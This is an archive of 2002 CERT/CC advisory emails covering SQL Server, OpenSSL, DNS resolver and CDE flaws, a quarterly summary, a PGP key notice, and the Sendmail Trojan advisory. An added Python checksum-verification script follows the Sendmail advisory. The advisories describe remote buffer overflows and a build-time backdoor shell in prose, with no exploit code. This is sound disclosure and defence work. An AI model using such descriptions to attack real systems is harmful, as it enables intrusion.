As a workaround, it is possible to limit exposure to these vulnerabilities by restricting external access to Microsoft SQL Servers on ports 1433/tcp, 1433/udp, 1434/tcp, and 1434/udp. Note that VU#399260 and VU#484891 can be exploited using UDP packets with forged source addresses that appear to belong to legitimate services, so system administrators should restrict all incoming packets sent to 1434/udp.

Appendix A. - Vendor Information

This appendix contains information provided by vendors for this advisory. As vendors report new information to the CERT/CC, we will update this section and note the changes in our revision history. If a particular vendor is not listed below, we have not received their comments.

Appendix B. - CERT Vulnerability Notes sorted by Microsoft Security Bulletin ID

This appendix contains a list of CERT Vulnerability Notes sorted in reverse chronological order by their corresponding Microsoft Security Bulletin IDs. System administrators should use this list to ensure that each of the patches listed in these bulletins has been applied.
MS02-039 : Buffer Overruns in SQL Server 2000 Resolution Service Could Enable Code Execution (Q323875)
  VU#399260 - Microsoft SQL Server 2000 contains heap buffer overflow in SQL Server Resolution Service
  VU#484891 - Microsoft SQL Server 2000 contains stack buffer overflow in SQL Server Resolution Service
  VU#370308 - Microsoft SQL Server 2000 contains denial-of-service vulnerability in SQL Server Resolution Service

MS02-038 : Unchecked Buffer in SQL Server 2000 Utilities Could Allow Code Execution (Q316333)
  VU#279323 - Microsoft SQL Server contains buffer overflows in several Database Consistency Checkers
  VU#508387 - Microsoft SQL Server contains SQL injection vulnerability in replication stored procedures

MS02-035 : SQL Server Installation Process May Leave Passwords on System (Q263968)
  VU#338195 - Microsoft SQL Server installation process leaves sensitive information on system

MS02-034 : Cumulative Patch for SQL Server (Q316333)
  VU#225555 - Microsoft SQL Server contains buffer overflow in pwdencrypt() function
  VU#682620 - Microsoft SQL Server contains buffer overflow in code used to process "BULK INSERT" queries
  VU#796313 - Microsoft SQL Server service account registry key has weak permissions that permit escalation of privileges

MS02-030 : Unchecked Buffer in SQLXML Could Lead to Code Execution (Q321911)
  VU#811371 - Microsoft SQLXML ISAPI filter vulnerable to buffer overflow via contenttype parameter
  VU#139931 - Microsoft SQLXML HTTP components vulnerable to cross-site scripting via root parameter

MS02-020 : SQL Extended Procedure Functions Contain Unchecked Buffers (Q319507)
  VU#627275 - Microsoft SQL Server extended stored procedures contain buffer overflows

MS02-007 : SQL Server Remote Data Source Function Contain Unchecked Buffers
  VU#619707 - Microsoft SQL Server contains buffer overflows in openrowset and opendatasource macros

MS01-060 : SQL Server Text Formatting Functions Contain Unchecked Buffers
  VU#700575 - Buffer overflows in Microsoft SQL Server 7.0 and
SQL Server 2000

Appendix C. - References

http://www.microsoft.com/technet/security/bulletin/MS02-007.asp
http://www.microsoft.com/technet/security/bulletin/MS02-020.asp
http://www.microsoft.com/technet/security/bulletin/MS02-030.asp
http://www.microsoft.com/technet/security/bulletin/MS02-034.asp
http://www.microsoft.com/technet/security/bulletin/MS02-035.asp
http://www.microsoft.com/technet/security/bulletin/MS02-038.asp
http://www.microsoft.com/technet/security/bulletin/MS02-039.asp
http://www.microsoft.com/technet/security/bulletin/MS01-060.asp
http://support.microsoft.com/support/misc/kblookup.asp?id=Q316333
http://support.microsoft.com/support/misc/kblookup.asp?id=Q319507
http://support.microsoft.com/support/misc/kblookup.asp?id=Q323875
http://www.appsecinc.com/resources/alerts/mssql/02-0000.html
http://www.nextgenss.com/vna/ms-sql.txt
http://www.theregister.co.uk/content/4/26086.html
http://www.securityfocus.com/bid/5014
http://www.securityfocus.com/bid/5204
http://www.securityfocus.com/bid/5205
http://www.kb.cert.org/vuls/id/139931
http://www.kb.cert.org/vuls/id/225555
http://www.kb.cert.org/vuls/id/279323
http://www.kb.cert.org/vuls/id/338195
http://www.kb.cert.org/vuls/id/370308
http://www.kb.cert.org/vuls/id/399260
http://www.kb.cert.org/vuls/id/484891
http://www.kb.cert.org/vuls/id/508387
http://www.kb.cert.org/vuls/id/619707
http://www.kb.cert.org/vuls/id/627275
http://www.kb.cert.org/vuls/id/682620
http://www.kb.cert.org/vuls/id/700575
http://www.kb.cert.org/vuls/id/796313
http://www.kb.cert.org/vuls/id/811371
_________________________________________________________________

The CERT Coordination Center thanks NGSSoftware and Microsoft for their contributions to this document.
_________________________________________________________________

Author: This document was written by Jeffrey P. Lanza. Your feedback is appreciated.
______________________________________________________________________

This document is available from:
http://www.cert.org/advisories/CA-2002-22.html
______________________________________________________________________
_________________________________________________________________

Conditions for use, disclaimers, and sponsorship information

Copyright 2002 Carnegie Mellon University.

Revision History

Jul 29, 2002: Initial release

From - Tue Jul 30 13:52:25 2002
Date: Tue, 30 Jul 2002 13:42:37 -0400
From: CERT Advisory
To: cert-advisory@cert.org
Organization: CERT(R) Coordination Center - +1 412-268-7090
Subject: CERT Advisory CA-2002-23 Multiple Vulnerabilities In OpenSSL

CERT Advisory CA-2002-23 Multiple Vulnerabilities In OpenSSL

Original release date: July 30, 2002
Last revised: --
Source: CERT/CC

A complete revision history can be found at the end of this file.

Systems Affected

* OpenSSL prior to 0.9.6e, up to and including pre-release 0.9.7-beta2
* OpenSSL pre-release 0.9.7-beta2 and prior with Kerberos enabled
* SSLeay library

Overview

There are four remotely exploitable buffer overflows in OpenSSL. There are also encoding problems in the ASN.1 library used by OpenSSL. Several of these vulnerabilities could be used by a remote attacker to execute arbitrary code on the target system. All could be used to create denial of service.

I. Description

OpenSSL is a widely deployed, open source implementation of the Secure Sockets Layer (SSL v2/v3) and Transport Layer Security (TLS v1) protocols as well as a full-strength general purpose cryptography library. The SSL and TLS protocols are used to provide a secure connection between a client and a server for higher level protocols such as HTTP.

Four remotely exploitable vulnerabilities exist in many OpenSSL client and server systems.

VU#102795 - OpenSSL servers contain a buffer overflow during the SSLv2 handshake process

Versions of OpenSSL servers prior to 0.9.6e and pre-release version 0.9.7-beta2 contain a remotely exploitable buffer overflow vulnerability. This vulnerability can be exploited by a client using a malformed key during the handshake process with an SSL server connection.
Note that only SSLv2-supported sessions are affected by this issue. This issue is also being referenced as CAN-2002-0656.

VU#258555 - OpenSSL clients contain a buffer overflow during the SSLv3 handshake process

OpenSSL clients using SSLv3 prior to version 0.9.6e and pre-release version 0.9.7-beta2 contain a buffer overflow vulnerability. A malicious server can exploit this by sending a large session ID to the client during the handshake process. This issue is also being referenced as CAN-2002-0656.

VU#561275 - OpenSSL servers with Kerberos enabled contain a remotely exploitable buffer overflow vulnerability during the SSLv3 handshake process

Servers running OpenSSL pre-release version 0.9.7 with Kerberos enabled contain a remotely exploitable buffer overflow vulnerability. This vulnerability can be exploited by a malicious client sending a malformed key during the SSLv3 handshake process with the server. This issue is also being referenced as CAN-2002-0657.

VU#308891 - OpenSSL contains multiple buffer overflows in buffers that are used to hold ASCII representations of integers

OpenSSL clients and servers prior to version 0.9.6e and pre-release version 0.9.7-beta2 contain multiple remotely exploitable buffer overflow vulnerabilities if running on 64-bit platforms. These buffers are used to hold ASCII representations of integers. This issue is also being referenced as CAN-2002-0655.

In addition, a separate issue has been identified in OpenSSL involving malformed ASN.1 encodings. Affected components include SSL or TLS applications, as well as S/MIME, PKCS#7, and certificate creation routines.

VU#748355 - ASN.1 encoding errors exist in implementations of SSL, TLS, S/MIME, PKCS#7 routines

The ASN.1 library used by OpenSSL has various encoding errors that allow malformed certificate encodings to be parsed incorrectly. Exploitation of this vulnerability can lead to remote denial-of-service issues.
Routines affected include those supporting SSL and TLS applications, as well as those supporting S/MIME, PKCS#7, and certificate creation. This issue is also being referenced as CAN-2002-0659.

Although these vulnerabilities affect OpenSSL, other implementations of the SSL protocol that use or share a common code base may be affected. This includes implementations that are derived from the SSLeay library developed by Eric A. Young and Tim J. Hudson.

As noted in the OpenSSL advisory as well, sites running OpenSSL 0.9.6d servers on 32-bit platforms with SSLv2 handshaking disabled will not be affected by any of the buffer overflows described above. However, due to the nature of the ASN.1 encoding errors, such sites may still be affected by denial-of-service situations.

II. Impact

By exploiting the buffer overflows above, a remote attacker can execute arbitrary code on a vulnerable server or client system or cause a denial-of-service situation. Exploitation of the ASN.1 encoding errors can lead to a denial of service.

III. Solution

Apply a patch from your vendor

Appendix A contains information provided by vendors for this advisory. As vendors report new information to the CERT/CC, we will update this section and note the changes in our revision history. If a particular vendor is not listed below or in the individual vulnerability notes, we have not received their comments. Please contact your vendor directly.

Upgrade to version 0.9.6e of OpenSSL

Upgrade to version 0.9.6e of OpenSSL to resolve the issues addressed in this advisory. As noted in the OpenSSL advisory, separate patches are available:

Combined patches for OpenSSL 0.9.6d:
http://www.openssl.org/news/patch_20020730_0_9_6d.txt

After either applying the patches above or upgrading to 0.9.6e, recompile all applications using OpenSSL to support SSL or TLS services, and restart said services or systems. This will eliminate all known vulnerable code.
Sites running OpenSSL pre-release version 0.9.7-beta2 may wish to upgrade to 0.9.7-beta3, which corrects these vulnerabilities. Separate patches are available as well:

Combined patches for OpenSSL 0.9.7 beta 2:
http://www.openssl.org/news/patch_20020730_0_9_7.txt

Disable vulnerable applications or services

Until fixes for these vulnerabilities can be applied, disable all applications that use vulnerable implementations of OpenSSL. Systems with OpenSSL 0.9.7 pre-release with Kerberos enabled also need to disable Kerberos to protect against VU#561275.

As a best practice, the CERT/CC recommends disabling all services that are not explicitly required. Before deciding to disable SSL or TLS, carefully consider the impact that this will have on your service requirements.

Disabling SSLv2 handshaking will prevent exploitation of VU#102795. However, due to the nature of the ASN.1 encoding errors, such sites would still be vulnerable to denial-of-service attacks.

Appendix A. - Vendor Information

This appendix contains information provided by vendors for this advisory. As vendors report new information to the CERT/CC, we will update this section and note the changes in our revision history. If a particular vendor is not listed below or in the individual vulnerability notes, we have not received their comments.

OpenLDAP

The OpenLDAP Project uses OpenSSL. Rebuilding OpenLDAP with updated versions of OpenSSL should adequately address reported issues. Those using packaged versions of OpenLDAP should contact the package distributor for update information.

OpenSSL

Please see http://www.openssl.org/news/secadv_20020730.txt.

Red Hat

Red Hat distributes affected versions of OpenSSL in all Red Hat Linux distributions as well as the Stronghold web server. Red Hat Linux errata packages that fix the above vulnerabilities (CAN-2002-0655 and CAN-2002-0656) are available from the URL below. Users of the Red Hat Network are able to update their systems using the 'up2date' tool.
A future update will fix the potential remote DOS in the ASN.1 encoding (CAN-2002-0659).

http://rhn.redhat.com/errata/RHSA-2002-155.html
_________________________________________________________________

These vulnerabilities were discovered and reported by the following:

* VU#102795 - discovered by A.L. Digital Ltd and independently discovered and reported by John McDonald of Neohapsis
* VU#258555, VU#561275, VU#308891 - discovered by A.L. Digital Ltd
* VU#748355 - discovered by Adi Stav and James Yonan independently

The CERT/CC thanks the OpenSSL team for the work they put into their advisory, on which this document is largely based.
_________________________________________________________________

Feedback can be directed to the authors: Jason A. Rafail, Cory F. Cohen, Jeffrey S. Havrilla, Shawn V. Hernan.
______________________________________________________________________

This document is available from:
http://www.cert.org/advisories/CA-2002-23.html
______________________________________________________________________
_________________________________________________________________

Conditions for use, disclaimers, and sponsorship information

Copyright 2002 Carnegie Mellon University.

Revision History

July 30, 2002: Initial release

From - Tue Aug 27 22:07:37 2002
Date: Tue, 27 Aug 2002 22:57:23 -0400
From: CERT Advisory
To: cert-advisory@cert.org
Organization: CERT(R) Coordination Center - +1 412-268-7090
Subject: UPDATE - CERT Advisory CA-2002-19 Buffer Overflows in Multiple DNS Resolver Libraries

UPDATE: CERT Advisory CA-2002-19 Buffer Overflows in Multiple DNS Resolver Libraries

August 27, 2002

An important change has been made to CERT Advisory CA-2002-19. The workaround of using a local caching DNS server is not completely effective. Specifically, some malicious DNS responses can be cached, reconstructed, and passed on to systems that may have vulnerable DNS resolver libraries.

For the most current information, including which systems are affected and vendor statements, please see the documents listed at the end of this message.

The following change was made to section III. of CA-2002-19:

======================================================================

III. Solution

Upgrade to a corrected version of the DNS resolver libraries

[no change]

Use of a local caching DNS server is not an effective workaround

When this advisory was initially published, it was thought that a caching DNS server that reconstructs DNS responses would prevent malicious code from reaching systems with vulnerable resolver libraries. This workaround is not sufficient. It does not prevent some DNS responses that contain malicious code from reaching clients, whether or not the responses are reconstructed by a local caching DNS server. DNS responses containing code that is capable of exploiting the vulnerabilities described in VU#803539 and VU#542971 can be cached and reconstructed before being transmitted to clients.
Since the server may cache the responses, the malicious code could persist until the server's cache is purged or the entries expire. The only complete solution to this problem is to upgrade to a corrected version of the DNS resolver libraries as noted above.

======================================================================

The following documents have been revised:

CERT Advisory CA-2002-19
http://www.cert.org/advisories/CA-2002-19.html

Vulnerability Note VU#803539
http://www.kb.cert.org/vuls/id/803539

Vulnerability Note VU#542971
http://www.kb.cert.org/vuls/id/542971

From - Fri Aug 30 16:44:07 2002
Date: Fri, 30 Aug 2002 17:44:48 -0400
From: CERT Advisory
To: cert-advisory@cert.org
Organization: CERT(R) Coordination Center - +1 412-268-7090
Subject: CERT Summary CS-2002-03

-----BEGIN PGP SIGNED MESSAGE-----

CERT Summary CS-2002-03

August 30, 2002

Each quarter, the CERT Coordination Center (CERT/CC) issues the CERT summary to draw attention to the types of attacks reported to our incident response team, as well as other noteworthy incident and vulnerability information. The summary includes pointers to sources of information for dealing with the problems.

Past CERT summaries are available at http://www.cert.org/summaries/.

______________________________________________________________________

Recent Activity

Since the last regularly scheduled CERT summary, issued in May 2002 (CS-2002-02), we have released several advisories, published statistics for the second quarter of 2002, and written numerous white papers.

For more current information on activity being reported to the CERT/CC, please visit the CERT/CC Current Activity page. The Current Activity page is a regularly updated summary of the most frequent, high-impact types of security incidents and vulnerabilities being reported to the CERT/CC. The information on the Current Activity page is reviewed and updated as reporting trends change.

1. Multiple Vulnerabilities in CDE ToolTalk

The Common Desktop Environment (CDE) ToolTalk RPC database server contains a buffer overflow vulnerability that could allow a remote attacker to execute arbitrary code or cause a denial of service.

CERT Advisory CA-2002-26: Buffer Overflow in CDE ToolTalk
http://www.cert.org/advisories/CA-2002-26.html

Two vulnerabilities have been discovered in the Common Desktop Environment (CDE) ToolTalk RPC database server.
The first vulnerability could be used by a remote attacker to delete arbitrary files, cause a denial of service, or possibly execute arbitrary code or commands. The second vulnerability could allow a local attacker to overwrite arbitrary files with contents of the attacker's choice.

CERT Advisory CA-2002-20: Multiple Vulnerabilities in CDE ToolTalk
http://www.cert.org/advisories/CA-2002-20.html

2. Integer Overflow in XDR Library

There is an integer overflow present in the xdr_array() function distributed as part of the Sun Microsystems XDR library. This overflow has been shown to lead to remotely exploitable buffer overflows in multiple applications, leading to the execution of arbitrary code. Although the library was originally distributed by Sun Microsystems, multiple vendors have included the vulnerable code in their own implementations.

CERT Advisory CA-2002-25: Integer Overflow in XDR Library
http://www.cert.org/advisories/CA-2002-25.html

3. Multiple Vulnerabilities in OpenSSL

There are four remotely exploitable buffer overflows in OpenSSL. There are also encoding problems in the ASN.1 library used by OpenSSL. Several of these vulnerabilities could be used by a remote attacker to execute arbitrary code on the target system. All could be used to cause a denial of service.

CERT Advisory CA-2002-23: Multiple Vulnerabilities in OpenSSL
http://www.cert.org/advisories/CA-2002-23.html

4. Multiple Vulnerabilities in Microsoft SQL Server

The CERT/CC is still receiving reports of systems being compromised by exploiting vulnerabilities in Microsoft SQL Server. The Microsoft SQL Server contains several serious vulnerabilities that allow remote attackers to obtain sensitive information, alter database contents, compromise SQL servers, and, in some configurations, compromise server hosts.

CERT Advisory CA-2002-22: Multiple Vulnerabilities in Microsoft SQL Server
http://www.cert.org/advisories/CA-2002-22.html

5. Buffer Overflows in Multiple DNS Resolver Libraries

Buffer overflow vulnerabilities exist in multiple implementations of DNS resolver libraries. Operating systems and applications that utilize vulnerable DNS resolver libraries may be affected.

CERT Advisory CA-2002-19: Buffer Overflows in Multiple DNS Resolver Libraries
http://www.cert.org/advisories/CA-2002-19.html

6. OpenSSH Vulnerabilities in Challenge Response Handling

There are two related vulnerabilities in the challenge response handling code in OpenSSH versions 2.3.1p1 through 3.3. They may allow a remote intruder to execute arbitrary code as the user running sshd (often root). The first vulnerability affects OpenSSH versions 2.9.9 through 3.3 that have the challenge response option enabled and use SKEY or BSD_AUTH authentication. The second vulnerability affects PAM modules using interactive keyboard authentication in OpenSSH versions 2.3.1p1 through 3.3, regardless of the challenge response option setting.

CERT Advisory CA-2002-18: OpenSSH Vulnerabilities in Challenge Response Handling
http://www.cert.org/advisories/CA-2002-18.html

7. Apache Web Server Chunk Handling Vulnerability

There is a remotely exploitable vulnerability in the handling of large chunks of data in web servers that are based on Apache source code. This vulnerability is present by default in configurations of Apache web servers versions 1.3 through 1.3.24 and versions 2.0 through 2.0.36. The impact of this vulnerability is dependent upon the software version and the hardware platform the server is running on.

CERT Advisory CA-2002-17: Apache Web Server Chunk Handling Vulnerability
http://www.cert.org/advisories/CA-2002-17.html

8. Denial-of-Service Vulnerability in ISC BIND 9

A denial-of-service vulnerability exists in version 9 of the Internet Software Consortium's (ISC) Berkeley Internet Name Domain (BIND) server. ISC BIND versions 8 and 4 are not affected. Exploiting this vulnerability will cause the BIND server to shut down.
CERT Advisory CA-2002-15: Denial-of-Service Vulnerability in ISC BIND 9
http://www.cert.org/advisories/CA-2002-15.html

______________________________________________________________________

What's New and Updated

Since the last CERT Summary, we have published new or updated

* Advisories
* Incident Notes
* CERT/CC Statistics
* Tech Tips
* White Papers
  + Securing an Internet Name Server
  + Creating a Computer Security Incident Response Team: A Process for Getting Started
  + Flow-Service-Quality (FSQ) Engineering: Foundations for Network System Analysis and Development
  + A Brief Tour of the Simple Network Management Protocol
  + Information Survivability: Required Shifts in Perspective

______________________________________________________________________

NO WARRANTY

Any material furnished by Carnegie Mellon University and the Software Engineering Institute is furnished on an "as is" basis. Carnegie Mellon University makes no warranties of any kind, either expressed or implied as to any matter including, but not limited to, warranty of fitness for a particular purpose or merchantability, exclusivity or results obtained from use of the material. Carnegie Mellon University does not make any warranty of any kind with respect to freedom from patent, trademark, or copyright infringement.

_________________________________________________________________

Conditions for use, disclaimers, and sponsorship information

Copyright ©2002 Carnegie Mellon University.
-----BEGIN PGP SIGNATURE-----
Version: PGP 6.5.8

iQCVAwUBPW/YUqCVPMXQI2HJAQF09wP/bMHhIj2+bFvWrowsfqObNhHopNYpr0Jj
VjsYIhzpUISRTefEGArKCoww/Zp7qnVEp/RN7O1mkRRdt9zhGMWHQhta8tCgmsX5
ADYelx3NEUteT1Ui5xnl4THEMtiMC8knPeDCH6RCKnfnpAFhsCYxebhPQchYUG+Z
SS8A1klR0Q0=
=K40G
-----END PGP SIGNATURE-----

From - Thu Sep 19 17:09:45 2002
Date: Thu, 19 Sep 2002 18:11:36 -0400
From: CERT Advisory
To: cert-advisory@cert.org
Organization: CERT(R) Coordination Center - +1 412-268-7090
Subject: New CERT/CC PGP Key

-----BEGIN PGP SIGNED MESSAGE-----

New CERT® Coordination Center (CERT/CC) PGP Key

The current CERT/CC PGP key will expire on Tuesday, October 1, 2002. We use this key to sign all outgoing email, including advisories sent to this list. A new key is available and will be valid until Wednesday, October 1, 2003.

To obtain further information or to download the new CERT/CC public PGP key, please visit

http://www.cert.org/contact_cert/encryptmail.html

A copy of the new key has also been included at the bottom of this message.

If you have any questions or comments regarding this information, please contact our hotline at +1 412-268-7090 or email us at cert@cert.org.

______________________________________________________________________

This document is available from: http://www.cert.org/pgp/newpgp2002.html

______________________________________________________________________

CERT/CC Contact Information

Email: cert@cert.org
Phone: +1 412-268-7090 (24-hour hotline)
Fax: +1 412-268-6989
Postal address:
CERT Coordination Center
Software Engineering Institute
Carnegie Mellon University
Pittsburgh PA 15213-3890
U.S.A.

CERT/CC personnel answer the hotline 08:00-17:00 EST(GMT-5) / EDT(GMT-4) Monday through Friday; they are on call for emergencies during other hours, on U.S. holidays, and on weekends.

Using encryption

We strongly urge you to encrypt sensitive information sent by email. Our public PGP key is available from http://www.cert.org/CERT_PGP.key

If you prefer to use DES, please call the CERT hotline for more information.
Getting security information

CERT publications and other security information are available from our web site http://www.cert.org/

To subscribe to the CERT mailing list for advisories and bulletins, send email to majordomo@cert.org. Please include in the body of your message:

subscribe cert-advisory

* "CERT" and "CERT Coordination Center" are registered in the U.S. Patent and Trademark Office.

______________________________________________________________________

Conditions for use, disclaimers, and sponsorship information
http://www.cert.org/legal_stuff.html

Copyright 2001, 2002 Carnegie Mellon University.
-----BEGIN PGP SIGNATURE-----
Version: PGP 6.5.8

iQCVAwUBPYogk6CVPMXQI2HJAQEJoQP/Tma4QfM4x7L2slJwt0JTDC5je2axAdLB
zGMuAkyeyrJ18uuiC/R20WApWVV0rpqN1t92lClKFArTvGKVCi0fBA+UgV/UHJf0
Ebc+8Jp7+VEhTRMYN47a+0o6YJaDvyR/d/MAK2lnlqYwHcxgHoxjBfGQMDsbj498
WLecb/E5MkQ=
=vvhT
-----END PGP SIGNATURE-----

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: GnuPG v1.0.6 (GNU/Linux)
Comment: For info see http://www.gnupg.org

mQCNAz2HdYUBewEEANlrALUkkCRO3Ptc9UMJggXbTVD2jHOZBurJOi3j3iNbPGJT
iUFCFJ8pEjeO/DIgmyvZ5iyekbAlIX80JP9nWylz1VN2r4VbsS4T5kAe6V2+8rVO
rioWEcrgO4rPhir8hWJvMt8NoZzchCoIj0u9PoNxHuUGL2NGJmjtSoHZUTs5AAUR
tChDRVJUIENvb3JkaW5hdGlvbiBDZW50ZXIgPGNlcnRAY2VydC5vcmc+iQCVAwUQ
PYd1hWjtSoHZUTs5AQF1MAP+OT0ZsrydA6LLmmJFnAF4duhk/qRn+ilih35q9Mof
Zed2yIhGvOpZ2D/UgaiAsrpjqPj1Rz6F4RUMEDLCDIDrAPVYwg+OAcCdWPXv3olU
3ihT/5/SMZBU3f6/qbcgxuwFWwwe809cF74li6LWhb42aui75xmF7o5wQOnVUTP8
8OuIRgQQEQIABgUCPYd24QAKCRBdive2pwqEYwj4AJ9jKsdH2rZC9F5xIhCnrjcF
vGLPBgCghO5OnL2DgXDM8sFxp78KDQSzpQ+JAJUDBRA9h3b+oJU8xdAjYckBAej4
A/4yIIw8yOLGx3Pt0nQTEaOMBPj2RngxFkJb6eDX38BSNq1M5AHXnIjF62AyBDNW
eUu5VGeQv1eRb7oCFqmkdh1xWWxFKFFaZptzT3/CYtFadwk8AUqQSOu7q5MoeDQb
vcl2twhlPQCD5LBk5n6l51SekswG9Y3ByKZ8hn+LTLUUGohGBBARAgAGBQI9h3cN
AAoJEEkI6HrAePTS6pkAoNWHrTy0cDJUM3zC9Yvgf4BvdIFzAKDCKF9CayeKYLhh
oLGzdJubDXpihohGBBARAgAGBQI9h60jAAoJEEyjwJ0liX560jwAoNKoURldCD65
GuBko4W9iNWjgpZXAKC3Fqz5pV51ACy9izsQhp18awI4/IhGBBARAgAGBQI9h8Fv
AAoJEJP/BRA2wmijEOYAoPop4W5FWqIJNQA5Mb0D4uSe6/U9AKDr4L++kuaWJRLW
IGmZPbGIlhjFNw==
=KTsH
-----END PGP PUBLIC KEY BLOCK-----

From - Tue Oct 8 16:54:13 2002
Date: Tue, 8 Oct 2002 17:53:58 -0400
From: CERT Advisory
To: cert-advisory@cert.org
Organization: CERT(R) Coordination Center - +1 412-268-7090
Subject: CERT Advisory CA-2002-28 Trojan Horse Sendmail Distribution

-----BEGIN PGP SIGNED MESSAGE-----

CERT Advisory CA-2002-28 Trojan Horse Sendmail Distribution

Original release date: October 08, 2002
Last revised: --
Source: CERT/CC

A complete revision history is at the end of this file.

Overview

The CERT/CC has received confirmation that some copies of the source code for the Sendmail package were modified by an intruder to contain a Trojan horse. Sites that employ, redistribute, or mirror the Sendmail package should immediately verify the integrity of their distribution.

I. Description

The CERT/CC has received confirmation that some copies of the source code for the Sendmail package have been modified by an intruder to contain a Trojan horse. The following files were modified to include the malicious code:

sendmail.8.12.6.tar.Z
sendmail.8.12.6.tar.gz

These files began to appear in downloads from the FTP server ftp.sendmail.org on or around September 28, 2002. The Sendmail development team disabled the compromised FTP server on October 6, 2002 at approximately 22:15 PDT. It does not appear that copies downloaded via HTTP contained the Trojan horse; however, the CERT/CC encourages users who may have downloaded the source code via HTTP during this time period to take the steps outlined in the Solution section as a precautionary measure.

The Trojan horse versions of Sendmail contain malicious code that is run during the process of building the software. This code forks a process that connects to a fixed remote server on 6667/tcp.
This forked process allows the intruder to open a shell running in the context of the user who built the Sendmail software. There is no evidence that the process is persistent after a reboot of the compromised system. However, a subsequent build of the Trojan horse Sendmail package will re-establish the backdoor process.

II. Impact

An intruder operating from the remote address specified in the malicious code can gain unauthorized remote access to any host that compiled a version of Sendmail from this Trojan horse version of the source code. The level of access would be that of the user who compiled the source code.

It is important to understand that the compromise is to the system that is used to build the Sendmail software and not to the systems that run the Sendmail daemon. Because the compromised system creates a tunnel to the intruder-controlled system, the intruder may have a path through network access controls.

III. Solution

Obtain an authentic version of Sendmail

The primary distribution site for Sendmail is

http://www.sendmail.org/

Sites that mirror the Sendmail source code are encouraged to verify the integrity of their sources.

Verify software authenticity

We strongly encourage sites that recently downloaded a copy of the Sendmail distribution to verify the authenticity of their distribution, regardless of where it was obtained. Furthermore, we encourage users to inspect any and all software that may have been downloaded from the compromised site. Note that it is not sufficient to rely on the timestamps or sizes of the files when trying to determine whether or not you have a copy of the Trojan horse version.

Verify PGP signatures

The Sendmail source distribution is cryptographically signed with the following PGP key:

pub 1024R/678C0A03 2001-12-18 Sendmail Signing Key/2002
Key fingerprint = 7B 02 F4 AA FC C0 22 DA 47 3E 2A 9A 9B 35 22 45

The Trojan horse copy did not include an updated PGP signature, so attempts to verify its integrity would have failed.
The sendmail.org staff has verified that the Trojan horse copies did indeed fail PGP signature checks.

Verify MD5 checksums

In the absence of PGP, you can use the following MD5 checksums to verify the integrity of your Sendmail source code distribution:

Correct versions:

73e18ea78b2386b774963c8472cbd309 sendmail.8.12.6.tar.gz
cebe3fa43731b315908f44889d9d2137 sendmail.8.12.6.tar.Z
8b9c78122044f4e4744fc447eeafef34 sendmail.8.12.6.tar.sig

As a matter of good security practice, the CERT/CC encourages users to verify, whenever possible, the integrity of downloaded software. For more information, see

http://www.cert.org/incident_notes/IN-2001-06.html

Employ egress filtering

Egress filtering manages the flow of traffic as it leaves a network under your administrative control. In the case of the Trojan horse Sendmail distribution, employing egress filtering can help prevent systems on your network from connecting to the remote intruder-controlled system. Blocking outbound TCP connections to port 6667 from your network reduces the risk of internal compromised machines communicating with the remote system.

Build software as an unprivileged user

Sites are encouraged to build software from source code as an unprivileged, non-root user on the system. This can lessen the immediate impact of Trojan horse software. Compiling software that contains Trojan horses as the root user results in a compromise that is much more difficult to reliably recover from than if the Trojan horse is executed as a normal, unprivileged user on the system.

Recovering from a system compromise

If you believe a system under your administrative control has been compromised, please follow the steps outlined in Steps for Recovering from a UNIX or NT System Compromise

Reporting

The CERT/CC is interested in receiving reports of this activity. If machines under your administrative control are compromised, please send mail to cert@cert.org with the following text included in the subject line: "[CERT#33376]".
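The verification steps in section III above (PGP signature, MD5 checksums, building as an unprivileged user) can be scripted so that a download is checked the same way every time. The following is an added example, not CERT/CC or sendmail.org code. The MD5 values, file names and the 2002 signing-key fingerprint are taken from the advisory text; the rest is assumed: `gpg` is on PATH with the Sendmail key imported (needed only for the signature step), and the reference table is passed in explicitly for files the advisory does not list.

```python
"""Check a downloaded Sendmail 8.12.6 distribution against the reference
values printed in CA-2002-28.

Added example, not CERT/CC or sendmail.org code. Assumption: 'gpg' is on
PATH with the Sendmail signing key imported (signature step only).
"""
import hashlib
import os
import shutil
import subprocess
from pathlib import Path

# MD5 reference values exactly as published in CA-2002-28.
KNOWN_GOOD_MD5 = {
    "sendmail.8.12.6.tar.gz": "73e18ea78b2386b774963c8472cbd309",
    "sendmail.8.12.6.tar.Z": "cebe3fa43731b315908f44889d9d2137",
    "sendmail.8.12.6.tar.sig": "8b9c78122044f4e4744fc447eeafef34",
}

# Fingerprint of "Sendmail Signing Key/2002" (1024R/678C0A03) from the advisory.
SENDMAIL_2002_FINGERPRINT = "7B 02 F4 AA FC C0 22 DA 47 3E 2A 9A 9B 35 22 45"

OK, MISMATCH, UNKNOWN = "OK", "MISMATCH", "UNKNOWN"


def md5_hex(data: bytes) -> str:
    """MD5 is used only because it is what the advisory publishes."""
    return hashlib.md5(data).hexdigest()


def check_bytes(filename: str, data: bytes, reference=None) -> str:
    """Classify file content as OK / MISMATCH / UNKNOWN against a reference table."""
    table = KNOWN_GOOD_MD5 if reference is None else reference
    expected = table.get(filename)
    if expected is None:
        return UNKNOWN                      # the advisory vouches for nothing here
    return OK if md5_hex(data) == expected.lower() else MISMATCH


def check_directory(directory) -> dict:
    """Check every file named in the reference table that exists in 'directory'."""
    results = {}
    for name in KNOWN_GOOD_MD5:
        path = Path(directory) / name
        if path.is_file():
            results[name] = check_bytes(name, path.read_bytes())
    return results


def fingerprint_matches(printed: str) -> bool:
    """Compare a fingerprint as gpg prints it (spacing and case vary) with the advisory's."""
    def norm(s):
        return "".join(s.split()).upper()
    return norm(printed) == norm(SENDMAIL_2002_FINGERPRINT)


def pgp_signature_ok(tarball, sig) -> bool:
    """Detached-signature check; the advisory notes the Trojan copies failed it."""
    if shutil.which("gpg") is None:
        raise RuntimeError("gpg is not installed")
    proc = subprocess.run(["gpg", "--verify", str(sig), str(tarball)],
                          capture_output=True, text=True)
    return proc.returncode == 0


def safe_to_build() -> bool:
    """The advisory recommends building as an unprivileged user, never root."""
    geteuid = getattr(os, "geteuid", None)
    return geteuid is None or geteuid() != 0


if __name__ == "__main__":
    import sys
    where = sys.argv[1] if len(sys.argv) > 1 else "."
    for name, status in check_directory(where).items():
        print(f"{status:8} {name}")
    if not safe_to_build():
        print("refusing to build as root")
```

A MISMATCH on the tarball with a good `.sig` checksum is exactly the pattern the advisory describes: the signature file was left alone while the archive was replaced, so run both checks rather than stopping at the first.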
Appendix A. - Vendor Information

This appendix contains information provided by vendors for this advisory. As vendors report new information to the CERT/CC, we will update this section and note the changes in our revision history. If a particular vendor is not listed below, we have not received their comments.

_________________________________________________________________

